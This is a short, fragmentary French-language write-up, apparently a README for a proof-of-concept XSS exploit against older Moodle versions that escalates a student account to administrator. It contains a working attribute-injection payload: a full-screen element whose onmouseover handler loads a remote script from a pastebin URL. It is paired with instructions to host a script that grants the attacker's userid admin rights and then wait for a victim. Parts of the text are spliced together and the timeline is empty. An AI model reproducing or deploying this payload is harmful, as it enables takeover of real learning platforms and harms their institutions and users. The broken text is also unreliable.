
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC XSS pour escalade de privilèges (Étudiant à Administrateur)
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC XSS pour l'escalade de privilèges (Étudiant à Administrateur). C'est l'un des bugs que j'ai découverts lors d'un pentest passé dans une institution académique. Il a été suffisamment efficace à l'époque pour voler pratiquement l'accès administrateur et prendre le contrôle total de Moodle en utilisant un seul bug simple.
Nous pouvons voir d'après l'historique git que le bug existait depuis les anciennes versions de Moodle (2003) et a été corrigé en 2019.
Chronologie:
UNIQUEMENT À DES FINS ÉDUCATIVES. N'UTILISEZ PAS L'EXPLOIT POUR DES ACTIVITÉS ILLÉGALES. L'AUTEUR N'EST PAS RESPONSABLE DE TOUTE MAUVAISE UTILISATION OU DE TOUT DOMMAGE.
userid pour votre propre identifiant. Supposons que l'URL soit https://pastebin.com/raw/xxxxxxxx." style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ ou mettez le lien vers cette page dans votre message et attendez.En cas de succès, votre compte sera ajouté en tant qu'administrateur.